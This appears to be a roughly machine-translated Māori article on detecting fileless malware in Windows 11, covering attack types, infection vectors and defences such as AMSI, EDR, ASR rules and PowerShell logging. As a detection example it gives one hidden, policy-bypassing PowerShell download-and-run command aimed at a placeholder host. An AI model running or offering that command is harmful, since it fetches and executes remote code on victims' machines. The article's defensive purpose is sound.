Me pehea te kite i te kino kino kore konae kei roto Windows 11

¿Me pehea te kite i te kino kino kore konae? Ko nga mahi whakaeke kore konae kua tino tipu haere, me te kino rawa atu, Ko te Windows 11 kare e parepareKo tenei huarahi ka hipa i te kōpae me te whakawhirinaki ki te mahara me nga taputapu punaha tika; ko te aha nga kaupapa wheori e pa ana ki te hainatanga e tohe ana. Mena kei te rapu koe i tetahi huarahi pono ki te kitea, ko te whakautu kei te whakakotahi waea, tātari whanonga, me nga mana Windows.

I roto i te puunaha rauwiringa kaiao o naianei, ka noho tahi nga kaupapa e tukino ana i a PowerShell, WMI, Mshta ranei me nga tikanga maamaa penei i te werohanga mahara, te tohe "kaore e pa" ki te kōpae, tae noa ki mahi tūkino mārōKo te mea nui ko te maarama ki te mahere riri, nga waahanga whakaeke, me nga tohu ka wehe atu ahakoa ka puta nga mea katoa i roto i te RAM.

He aha te kino kino kore konae me te aha he awangawanga kei roto Windows 11?

Ina korero tatou mo nga riri "kore konae", kei te korero tatou mo te waehere kino Kare koe e hiahia ki te whakatakoto i nga mahi whakahaere hou i roto i te punaha konae hei mahi. I te nuinga o te wa ka werohia ki roto i nga tukanga whakahaere me te mahi i roto i te RAM, ka whakawhirinaki ki nga kaiwhakamaori me nga taarua i hainatia e Microsoft (hei tauira, PowerShell, WMI, rundll32, mshtaKa whakaitihia to tapuwae ka taea e koe te karo i nga miihini e rapu ana i nga konae whakapae.

Ahakoa nga tuhinga tari, PDF ranei e whakamahi ana i nga whakaraeraetanga ki te whakarewa i nga whakahau ka kiia he waahanga o te ahuatanga, na te mea whakahohehia te mahi i roto i te mahara me te kore e waiho nga taarua whai hua hei tātari. Tukino o tonotono me DDE I te Tari, na te mea ka rere te waehere i roto i nga tikanga tika penei i a WinWord.

Ka whakakotahihia e te hunga whakaeke te mahi hangarau hapori (hītinihanga, hononga mokowhiti) me nga mahanga hangarau: ko te paato a te kaiwhakamahi ka timata i te mekameka e tango ai tetahi tuhinga me te kawe i te utu whakamutunga i roto i te mahara, te karo i te waiho he tohu i runga i te kōpae. Ko nga whaainga mai i te tahae raraunga ki te mahi ransomware, ki nga nekehanga taha taha wahangu.

Nga tohu ma te tapuwae i roto i te punaha: mai i te 'parakore' ki nga ranu

Hei karo i nga ariā rangirua, he pai ki te wehe i nga whakatuma ma te tohu o te taunekeneke ki te punaha konae. Ka whakamarama tenei whakarōpūtanga he aha te mea e mau tonu ana, kei hea te noho o te waehere, he aha nga tohu ka waiho?.

Momo I: kahore he mahi kōnae

Ko te kino kore konae kaore he tuhi ki te kōpae. He tauira matarohia ko te whakamahi a whakaraeraetanga whatunga (penei i te EternalBlue vector i tera ra) ki te whakatinana i te kuaha o muri e noho ana i roto i te mahara kernel (take penei i a DoublePulsar). I konei, ka tupu nga mea katoa i roto i te RAM, kaore he taonga i roto i te punaha konae.

Ko tetahi atu whiringa ko te whakapoke i te mārō o nga waahanga: BIOS/UEFI, urutau whatunga, USB peripheral (BadUSB-momo tikanga) tae noa ki nga punaha iti CPU. Ka tohe tonu ratou ma te whakaara ano me te whakauru ano, me te uaua ano He iti nga hua e tirotiro ana i te firmwareHe whakaeke uaua enei, he iti te auau, engari he kino na te puku me te roa.

Momo II: Mahi whakapuranga autaki

I konei, kaore te malware e "waiho" i tana ake mana whakahaere, engari ka whakamahia e te punaha whakahaere nga ipu ka tiakina hei konae. Hei tauira, ko nga tatau o muri e whakato ana whakahau powershell i roto i te putunga WMI me te whakaoho i tana mahi me nga whiriwhiringa takahanga. Ka taea te whakauru mai i te raina whakahau me te kore e whakaheke i nga waahanga-rua, engari kei te noho te putunga WMI i runga i te kōpae hei putunga korero tika, he uaua ki te horoi me te kore e pa ki te punaha.

Mai i te tirohanga whaitake ka kiia he kore konae, na te mea ko taua ipu (WMI, Rēhita, aha atu.) Ehara i te mea ka taea te whakahaere te kitea A ko tana horoi ehara i te mea iti. Ko te hua: te u tonu me te iti o te tohu "tuku iho".

Momo III: Me mahi nga konae

Ko etahi keehi ka mau tonu a te tohenga 'kore kōnae' I te taumata arorau, ka hiahia ratou ki te keu i runga i te konae. Ko te tauira angamaheni ko Kovter: ka rehitatia he kupu anga mo te toronga matapōkere; Ina whakatuwherahia he konae me taua toronga, ka whakarewahia he tuhinga iti e whakamahi ana i te mshta.exe, e hanga ana i te aho kino mai i te Rehita.

Ko te mahi tinihanga ko enei konae "maunu" me nga toronga matapōkeretia karekau he utu ka taea te tātari, a ko te nuinga o te waehere kei roto i te rēhitatanga (tetahi ipu). Koia te take ka whakarōpūhia he kore konae i te paanga, ahakoa ko te tino korero ka whakawhirinaki ratou ki tetahi, neke atu ranei o nga taonga kopae hei keu.

Nga Vectors me nga 'taua' o te mate: ki hea ka kuhu me te wahi huna

Hei whakapai ake i te kitenga, he mea nui ki te mapi i te waahi o te urunga me te ope o te mate. Ka awhina tenei tirohanga ki te hoahoa nga mana motuhake Whakaritea te tikanga waea e tika ana.

mahi

• I runga i te konae (Momo III): Ka taea e nga tuhinga, nga kaiwhakahaere, nga konae Flash/Java tuku iho, me nga konae LNK te whakamahi i te kaitirotiro, i te miihini ranei e tukatuka ana i a raatau ki te uta i te shellcode ki te mahara. Ko te vector tuatahi he konae, engari ka haere te utu ki te RAM.
• I runga i te whatunga (Momo I): Ko te putea e whakamahi ana i te whakaraeraetanga (hei tauira, i roto i te SMB) ka tutuki te mahi i te whenua kaiwhakamahi, i te pata ranei. I whakanuia e WannaCry tenei huarahi. Uta mahara tika kahore he kōnae hou.

pūmārō

• Pūrere (Momo I): Ka taea te whakarereke i te kopae, i te kaari whatunga ranei, me te whakauru i te waehere. He uaua ki te tirotiro me te noho tonu ki waho o te OS.
• PTM me nga punaha whakahaere (Momo I): Ko nga hangarau penei i te ME/AMT a Intel kua whakaatu i nga huarahi ki Whatunga me te mahi i waho o te OSKa whakaeke i te taumata iti rawa, me te kaha o te puku.
• USB (Momo I): Ka taea e BadUSB te whakahoahoa i te puku USB ki te whakaahua i te papapātuhi, i te NIC ranei, ka whakarewahia nga whakahau, te huri ano ranei i nga waka.
• BIOS / UEFI (Momo I): te whakahōtaka hou i te firmware kino (pēnei i a Mebromi) ka rere i mua i nga putu Windows.
• Kaitohutohu (Momo I): Te whakatinana i te iti-hypervisor i raro i te OS hei huna i tona aroaro. Onge, engari kua kitea i roto i te ahua o te hypervisor rootkits.

Te mahi me te werohanga

• I runga i te konae (Momo III): EXE/DLL/LNK, nga mahi kua whakaritea ranei e whakarewa ana i nga werohanga ki nga tikanga tika.
• tonotono (Momo III): Ka taea e te VBA i te Tari te wetewete me te kawe i nga utu utu, tae atu ki te ransomware katoa, me te whakaae a te kaiwhakamahi ma te tinihanga.
• hōtuhi (Momo II): PowerShell, VBScript, JScript ranei mai i te konae, raina whakahau, ratonga, Rehitatanga, WMI raneiKa taea e te kaiwhaiwhai te tuhi i te tuhinga i roto i te waahi mamao me te kore e pa ki te kōpae.
• Rekoata Whakaara (MBR/Boot) (Momo II): Ko nga whanau penei i a Petya ka tuhirua i te waahanga potae hei whakahaere i te tiimatanga. Kei waho o te punaha konae, engari ka uru ki te OS me nga otinga hou ka taea te whakahoki mai.

Me pehea te mahi whakaeke kore konae: nga waahanga me nga tohu

Ahakoa karekau e waiho nga konae ka taea te whakahaere, ka whai nga kaupapa i te arorau kua wehea. Ma te mohio ki a raatau ka taea te aroturuki. nga huihuinga me nga hononga i waenga i nga tukanga ka waiho he tohu.

• Te urunga tuatahiKo nga whakaeke hītinihanga ma te whakamahi i nga hononga, i nga taapiri ranei, i nga paetukutuku kua taupatupatuhia, i nga tohu tahae ranei. He maha nga mekameka ka timata ki te tuhinga Office e whakaoho ana i te whakahau PowerShell.
• Te noho tonu: ki muri ma te WMI (nga tātari me te ohaurunga), Nga taviri mahi rehita he mahi kua whakaritea hei whakaara ano i nga tuhinga kaore he konae kino hou.
• Te tangohangaIna kohia nga korero, ka tukuna ki waho o te whatunga ma te whakamahi i nga tikanga pono (kaitirotiro, PowerShell, bitsadmin) hei whakakotahi i nga waka.

He tino hianga tenei tauira na te mea ko te tohu whakaeke Ka huna i roto i te tikanga: nga tohenga raina-whakahau, te mahi mekameka, nga hononga ki waho, te uru ranei ki nga API werohanga.

Nga tikanga noa: mai i te mahara ki te tuhi

Ka whakawhirinaki nga kaiwhakaari ki te whānuitanga o tikanga e arotau puku. He pai ki te mohio ki nga mea tino noa hei whakahohe i te rapunga whai hua.

• Noho i roto i te mahara: Te uta i nga utu ki roto i te waahi o te tukanga whakawhirinaki e tatari ana mo te whakahohe. nga kete me nga matau I roto i te kakano, ka piki ake te taumata o te huna.
• Tonu i roto i te RehitaTiakina nga pupuhi whakamunatia ki roto i nga mau taviri ka whakamakuku mai i te whakarewatanga tika (mshta, rundll32, wscript). Ka taea e te kaitautauta ephemeral te whakangaro i a ia ano hei whakaiti i tona tapuwae.
• Hītinihanga whaimanaMa te whakamahi i nga ingoa ingoa me nga kupuhipa tahaetia, ka mahia e te kaitukino nga anga mamao me nga tipu uru wahangu i roto i te Rēhita WMI ranei.
• 'Kōnaekore' RansomwareKo te whakamunatanga me te whakawhitiwhiti korero C2 he mea whakarite mai i te RAM, ka whakaiti i nga waahi mo te rapu kia kitea ra ano te kino.
• Nga kete whakahaere: nga mekameka aunoa e kite ana i nga whakaraeraetanga me te tuku utu mahara-anake i muri i te pao a te kaiwhakamahi.
• Tuhinga me te waehere: nga tonotono me nga tikanga penei i te DDE e whakaohooho ana i nga tono me te kore e tiakina nga kaikohikohi ki te kōpae.

Kua whakaatuhia e nga rangahau ahumahi nga tihi rongonui: i tetahi wa o 2018, a neke atu i te 90% i runga i te tuhinga me nga whakaeke mekameka PowerShell, he tohu e pai ana te vector mo tona whaihua.

Ko te wero mo nga kamupene me nga kaiwhakarato: he aha te aukati i te kore e ranea

He mea whakamatautau ki te whakakore i te PowerShell, ki te aukati ranei i nga tonotono mo ake tonu atu, engari Ka pakaru koe i te mahiKo PowerShell he pou o te whakahaerenga hou, he mea nui a Office ki nga pakihi; Ko te aukati matapo kaore e taea.

I tua atu, he huarahi ki te karo i nga mana taketake: te whakahaere i te PowerShell na roto i nga DLL me te rundll32, te whakauru i nga tuhinga ki roto i nga EXE, Kawea mai to kape o PowerShell me huna ranei nga tuhinga ki nga whakaahua ka tango ki roto i te mahara. Na reira, kaore e taea te whakamarumaru noa i runga i te whakakore i te oranga o nga taputapu.

Ko tetahi atu he ko te tuku i te whakatau katoa ki te kapua: ki te tatari te kaihoko mo te whakautu mai i te tūmau, Ka ngaro koe i te wa-tūturu aukatiKa taea te tuku ake i nga raraunga Telemetry hei whakarangatira i nga korero, engari ko te Me puta te whakaiti i te pito mutunga.

Me pehea te kite i te kino kore konae i roto i te Windows 11: te waea me te whanonga

Ko te rautaki toa te aroturuki i nga tukanga me te maharaEhara i nga konae. Ko nga whanonga kino he pai ake i nga ahua o te konae, he pai mo nga miihini aukati.

• AMSI (Atanga Matawai Antimalware)Ka haukoti i nga tuhinga PowerShell, VBScript, JScript ranei ahakoa te hanga hihiri ki te mahara. He pai mo te hopu i nga aho whakapouri i mua i te mahi.
• Te aroturuki i te tukanga: timata/oti, PID, matua me nga tamariki, huarahi, rarangi whakahau me nga hashes, me nga rakau whakamate kia mohio ai ki te katoa o nga korero.
• Te tātari mahara: te kimi i nga werohanga, te whakaata, te uta PE ranei me te kore e pa ki te kopae, me te arotake i nga rohe kawe rereke.
• Tiaki rängai timatanga: te whakahaere me te whakahoki mai i te MBR/EFI mena ka rawekehia.

I roto i te rauwiringa kaiao o Microsoft, ka whakakotahi a Defender for Endpoint i te AMSI, te aroturuki whanongaKa whakamahia te matawai mahara me te ako miihini-a-kapua ki te tauine i nga kitenga ki nga momo rerekee hou ranei. Ko etahi atu kaihoko e whakamahi ana i nga huarahi rite ki nga miihini noho-kero.

He tauira tino tika o te hononga: mai i te tuhinga ki te PowerShell

Whakaarohia he mekameka ka tango a Outlook i tetahi apitihanga, ka whakatuwhera a Word i te tuhinga, ka whakahohea te ihirangi hohe, ka whakarewahia a PowerShell me nga tawhā hihira. Ka whakaatu te waea waea tika i te Raina Whakahaua (hei tauira, ExecutionPolicy Bypass, te matapihi huna), te hono ki tetahi rohe kore pono me te hanga i tetahi tukanga tamaiti e whakauru ana ki a AppData.

Ka taea e tetahi kaihoko whai horopaki rohe kati ka whakamuri mahi kino kaore he wawaotanga a-ringa, hei taapiri atu ki te whakamohio ki te SIEM ma te imeera / SMS ranei. Ko etahi hua ka taapirihia he paparanga tohu take (StoryLine-type models), e tohu ana kaua ki te tukanga e kitea ana (Outlook/Word), engari ki te miro kino katoa me tona takenga ki te horoi whanui i te punaha.

Ko te tauira whakahau angamaheni hei mataara kia penei pea te ahua: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http//dominiotld/payload');Ehara i te arorau te aho tika, engari te huinga tohu: karohia te kaupapa here, te matapihi huna, te tango marama, me te mahi i roto i te mahara.

AMSI, pipeline me te mahi a ia kaiwhakaari: mai i te pito ki te SOC

I tua atu i te hopu tuhinga, he hoahoanga pakari te whakarite i nga huarahi hei whakangawari i te tirotiro me te whakautu. Ko te nui ake o nga taunakitanga i mua i te mahi i te kawenga, te pai ake., pai rawa.

• Te haukoti tuhingaKa tukuna e te AMSI nga ihirangi (ahakoa ka hangaia i runga i te rere) mo te tātaritanga pateko me te hihiri i roto i te pipeline malware.
• Tukatuka i nga huihuingaKa kohia nga PID, nga rua, nga tohu, nga huarahi, me etahi atu raraunga. tautohetohe, te whakatuu i nga rakau mahi i arahi ki te kawenga whakamutunga.
• Te kimi me te ripoataKa whakaatuhia nga kitenga i runga i te papatohu hua ka tukuna atu ki nga papaaho whatunga (NDR) mo te tirohanga whakahau.
• Taurangi KaiwhakamahiAhakoa ka werohia he tuhinga ki te mahara, ko te anga Ka haukotia e AMSI i roto i nga putanga hototahi o Windows.
• Te kaha o te kaiwhakahaere: whirihoranga kaupapa here kia taea ai te tirotiro tuhinga, aukati i runga i te whanonga me te hanga purongo mai i te papatohu.
• Mahi SOC: te tangohanga o nga mea toi (VM UUID, te putanga OS, te momo tuhinga, te tukanga kaikokiri me ona matua, nga tohu me nga raina whakahau) hei hanga ano i te hitori me tikanga hiki heke mai.

I te wa e taea ai e te turanga te kaweake i te pūmau mahara I te taha o te whiunga, ka taea e nga kairangahau te whakaputa kitenga hou me te whakarangatira i te whakamarumaru ki nga momo rerekee.

Nga tikanga mahi i roto i te Windows 11: te aukati me te hopu

I tua atu i te whai EDR me te tirotiro mahara me te AMSI, Windows 11 ka taea e koe te kati i nga waahi whakaeke me te whakapai ake i te tirohanga nga mana Maori.

• Te rehitatanga me nga here ki PowerShellWhakahohehia te Takitaki Paraka Tuhituhi me te Takitaki Kōwae, ka whakamahi i nga aratau aukati i nga waahi ka taea, me te whakahaere i te whakamahinga o Tukua/Huna.
• Nga Ture Whakaiti Mata Whakaekea (ASR).: poraka ka whakarewahia nga tuhinga e nga tukanga Office me WMI tūkino/PSExec ina kore e hiahiatia.
• Nga kaupapa here tonotono a te tari: ka monohia ma te taunoa, te hainatanga tonotono o roto me nga rarangi whirinaki kaha; ka aroturuki i nga rerenga DDE tuku iho.
• WMI Arotake me te Rēhita: ka aro turuki i nga ohaurunga takahanga me nga taviri mahi aunoa (Run, RunOnce, Winlogon), me te hanga mahi whakaritea.
• Tiaki whakaoho: ka whakahohe i a Secure Boot, ka tirohia te tika o te MBR/EFI me te whakamana karekau he whakarereketanga i te tiimatanga.
• Te papaki me te whakapakeke: katia nga whakaraeraetanga ka taea i roto i nga kaitirotiro, nga waahanga Office, me nga ratonga whatunga.
• mōhiotanga: whakangungu i nga kaiwhakamahi me nga roopu hangarau ki te hītinihanga me nga tohu o nga whakamatenga huna.

Mo te whakangau, arotahi ki nga patai mo: te hanga i nga tukanga a Office ki a PowerShell/MSHTA, tohenga me downloadstring/downloadfileKo nga tuhinga e marama ana te whakapouri, nga werohanga whakaata, me nga whatunga ki waho ki nga TLD hihira. Whakawhitiwhiti enei tohu me te rongonui me te auau ki te whakaiti i te ngangau.

He aha ka kitea e ia miihini i tenei ra?

Ko nga otinga hinonga a Microsoft e whakakotahi ana i te AMSI, te tātari whanonga, tirohia te mahara me te whakamarumaru o te rängai putu, me nga tauira ML i runga i te kapua ki te tauine ki nga riri ka puta ake. Ko etahi atu kaihoko ka whakatinana i te aro turuki taumata-kerau ki te wehe i te kino mai i te rorohiko ngawari me te huri aunoa i nga huringa.

He huarahi i runga nga korero whakamate Ka taea e koe te tautuhi i te take pakiaka (hei tauira, he apitihanga Outlook e whakaohooho ana i te mekameka) me te whakaiti i te rakau katoa: nga tuhinga, nga taviri, nga mahi, me nga taarua takawaenga, kia kore ai e mau ki te tohu ka kitea.

Nga hapa noa me pehea te karo

Ko te aukati i a PowerShell me te kore he mahere whakahaere rereke ehara i te mea ngawari noa, engari ano hoki huarahi ki te karanga autakiKa pa ano ki nga tonotono: ka whakahaere koe ma nga kaupapa here me nga waitohu, ka raru ranei te pakihi. He pai ake te aro ki nga tikanga waea me nga tikanga whanonga.

Ko tetahi atu pohehe noa ko te whakapono ko nga tono whakaarangi ma te whakaoti i nga mea katoa: ka whakawhirinaki te hangarau kore konae ki tenei. taupānga whakawhirinakiMe titiro te mana whakahaere ki a raatau mahi me te pehea e pa ana, kaua ko te whakaae noa.

Ki nga mea katoa i runga ake nei, ka mutu te noho "wairua" kore konae i te wa e aro turuki ana koe i nga mea tino nui: te whanonga, te mahara, me te takenga mai o ia whakamatenga. Ko te whakakotahi i te AMSI, te momo waea nui, nga mana whakahaere Windows 11, me te paparanga EDR me te tātari whanonga ka whai hua koe. Tāpirihia ki te whārite nga kaupapa here mooni mo nga tonotono me te PowerShell, WMI/Rēhita arotake, me te whaiwhai e aro nui ana ki nga rarangi whakahau me nga rakau mahi, a he parepare kei a koe hei tapahi i enei mekameka i mua i te tangi.